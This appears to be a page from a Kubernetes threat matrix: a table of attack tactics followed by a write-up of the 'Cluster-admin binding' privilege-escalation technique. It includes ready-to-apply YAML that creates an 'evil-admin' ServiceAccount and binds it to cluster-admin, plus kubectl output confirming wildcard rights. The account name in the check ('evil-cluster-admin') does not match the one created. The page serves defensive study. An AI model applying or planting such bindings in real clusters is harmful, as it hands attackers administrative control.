Initial access Execution Persistence Privilege escalation Defense evasion Credential access Discovery Lateral movement Collection Impact
Using Cloud Exec into Container Backdoor Container Privileged Container Clear Container Logs List K8s secrets Access the K8s API server Access cloud resources Images from a private repository Data Destruction
Compromised images in registry bash/cmd in container Writable hostPath mount Cluster-admin binding Delete k8s events Mount service principal Access Kubelet API Container service account Ressource hijacking
Kubeconfig file New container Kubernetes CronJob hostPath mount Pod / container name similarity Access container service account Network mapping Cluster internal networking Denial of Service
Application vulnerability Application exploit (RCE) Malicious admission controller Access cloud resources Connect from proxy server Applications credentials in configuration files Access Kubernetes dashboard Applications credentials in configuration files
Exposed sensitive interfaces SSH server running in inside container Disable Namespacing Access managed identity credentials Instance metadata API Writable volume mounts on the host
Sidecar injection Malicious admission controller CoreDNS poisoning
ARP poisoning and IP spoofing

Cluster-admin binding

Role-based access control (RBAC) is a key security feature in Kubernetes. RBAC can restrict the allowed actions of the various identities in the cluster. Cluster-admin is a built-in high privileged role in Kubernetes. Attackers who have permissions to create bindings and cluster-bindings in the cluster can create a binding to the cluster-admin ClusterRole or to other high privileges roles.

Example

Create a new ServiceAccount evil-admin.

apiVersion: v1
kind: ServiceAccount
metadata:
  name: evil-admin
  namespace: default

Create a new RoleBinding (or ClusterRoleBinding) that binds our evil-admin ServiceAccount to the cluster-admin role.

kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: evil-admin-binding
  namespace: default
subjects:
  - kind: ServiceAccount
    name: evil-admin
    namespace: default
roleRef:
  kind: ClusterRole
  name: cluster-admin
  apiGroup: rbac.authorization.k8s.io

We now have full control over the default namespace.

$ kubectl auth can-i -n default --list --as system:serviceaccount:default:evil-cluster-admin
Resources                   Non-Resource URLs                   Resource Names   Verbs
*.*                         []                                  []               [*]
                            [*]                                 []               [*]
...

References